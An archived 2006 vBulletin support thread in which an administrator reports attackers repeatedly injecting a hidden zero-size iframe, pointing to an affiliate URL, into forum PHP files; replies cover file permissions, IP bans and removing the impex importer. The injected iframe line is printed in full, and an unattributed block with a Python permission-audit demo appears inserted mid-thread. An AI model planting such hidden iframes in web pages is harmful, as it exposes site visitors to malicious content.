
View Full Version : Forum keeps getting hacked


gbechtel
08-01-2006, 07:51 PM
I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

It is usually placed at the bottom of the PHP file, like in forumdisplay.php:

$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms & $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], true, false);
$show['forumslist'] = iif ($forumshown, true, false);
$show['stickies'] = iif ($threadbits_sticky != '', true, false);
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

($hook = vBulletinHook::fetch_hook('forumdisplay_complete') ) ? eval($hook) : false;

The code messes up the template and creates a number of pop-ups.

It's simple enough to fix, but I want to prevent it from happening again; it seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?

davidw
08-01-2006, 08:41 PM
You should be able to chmod them 644 I believe

bondjetta
08-01-2006, 08:49 PM
You should be able to chmod them 644 I believe
Mine are 644'd and I'm showing similar signs of this same dude on both AutomotiveArena.com and WorkSafeBoredom.com.

gbechtel
08-01-2006, 09:12 PM
Yeah mine are already 644 also. Would 444 be an option?

Gonna try it and see what happens.

UPDATE:

OK, the 444 seems to be working for the time being. I don't know if the lil twit has tried it again or not, but how was he able to do this in the first place?

I am not a security expert by any means but I think my vB is pretty secure. (renamed admin folders, htaccess etc...)

Is this some type of MySQL injection or something?

gbechtel
08-04-2006, 07:54 PM
The chmod 444 did not stop the lil twit.

On top of that the files that I did a chmod on were reverted back to 644.

Another interesting item: today, just before I got hacked, I had a new user join the forum.

IP Address used was 201.17.220.203

There is a new user, bunda at MassCops - Massachusetts Law Enforcement Network

To view their profile, go here:

http://www.masscops.com/forums/member.php?u=4212

Email Address : soauker@gmail.com
Birthday :


Is there any way I can stop this guy?
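The files reverting from 444 to 644 is the tell: mode bits only restrain processes that do not own the file, and the owner (or root) can chmod a file back at any time. When PHP runs as the same account that owns the forum files, which is the usual setup on shared hosting, any PHP the attacker can execute can undo the chmod and write. The snippet below is an added example (not from this thread or from vBulletin) that reproduces that sequence on a temporary file and then lists which PHP files a given uid owns, i.e. can rewrite regardless of mode. The temporary tree and the use of the current process uid as a stand-in for the web server's uid are assumptions for the demo.

```python
"""Why chmod 444 did not hold: the owner can always chmod back (added example)."""
import os
import stat
import tempfile


def probe_mode_defence(path):
    """Set 0444, then do what PHP running as the file owner can do: chmod back and write."""
    result = {}
    os.chmod(path, 0o444)
    result["mode_after_444"] = stat.S_IMODE(os.stat(path).st_mode)
    result["process_owns_file"] = os.stat(path).st_uid == os.geteuid()
    # chmod is permitted to the owner and to root; 0444 is a hint, not a boundary.
    os.chmod(path, 0o644)
    result["mode_after_revert"] = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, "a") as f:
        f.write("// appended after reverting the mode\n")
    result["write_succeeded"] = True
    return result


def files_owned_by(root, uid):
    """PHP files that uid owns and can therefore rewrite whatever the mode bits say."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(".php") and os.stat(path).st_uid == uid:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def run_demo():
    """Create a file as ourselves, show the 444 round-trip, and audit ownership."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "forumdisplay.php")
        with open(path, "w") as f:
            f.write("<?php\n")
        probe = probe_mode_defence(path)
        # Stand-in for the web server's uid: our own, since we just created the file.
        owned = files_owned_by(root, os.geteuid())
        return probe, owned


if __name__ == "__main__":
    print(run_demo())
```

The fix that actually holds is ownership, not mode: have the PHP files owned by a deploy account, run the web server as a different account with read-only access, and leave writable only the directories the board needs (attachments, cache, and the like). Run files_owned_by() with the web server's uid on a live install; anything it returns is rewritable from a web shell no matter how it is chmodded.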

davidw
08-04-2006, 07:59 PM
IMO, he gave himself away (the assumption is that it is a he). If it were me, I would block the whole host IP range in vBulletin, and if you have a firewall, add it to the firewall.

gbechtel
08-04-2006, 08:25 PM
Server co. says he is getting in through the impex directory....

davidw
08-04-2006, 08:40 PM
Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup

gbechtel
08-04-2006, 08:44 PM
already done, hope that was it...

davidw
08-04-2006, 08:45 PM
Don't forget to ban his IP addresses though :P

rasp187
08-05-2006, 02:12 AM
Heh, Impex should always be removed after you use it for reasons just like this. I hope it solved your problem. I took the liberty of banning his IP and email from my forums, too, just in case he happens to stumble upon them on google or something. Thanks for the heads up.

Nuguru
09-03-2006, 08:43 PM
Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup


Hello,

Looks like great advice, but where is the impex file so that I can delete it? Also, now that I have 3.5.4 installed, can I delete the install directory that seems to have all the upgrade files in it?

Thank You for your Help!

Nuguru :)

Freesteyelz
09-03-2006, 09:17 PM
The Impex files are located in a folder that's located in your forum root named "impex"; you can remove the entire directory. In your /includes remove the file "cpnav_impex.php".

As for your install directory remove "install.php" and all of the "upgrade.php" files or simply remove the directory itself.

Paul M
09-03-2006, 09:17 PM
impex will be a directory called .... impex :)

you can delete the install directory.

Nuguru
09-03-2006, 11:23 PM
The Impex files are located in a folder that's located in your forum root named "impex"; you can remove the entire directory. In your /includes remove the file "cpnav_impex.php".

As for your install directory remove "install.php" and all of the "upgrade.php" files or simply remove the directory itself.


Thank You for the Quick Response.


Nuguru

SportsZone
09-08-2006, 03:12 PM
I have a file directory called "installer." Can I delete that file? I also just deleted my "install" directory...

I'm not sure if this file has anything to do with the 3.6 upgrade, although it has a file called "product-ucs.xml" within it. So could this be a Ucash installer file?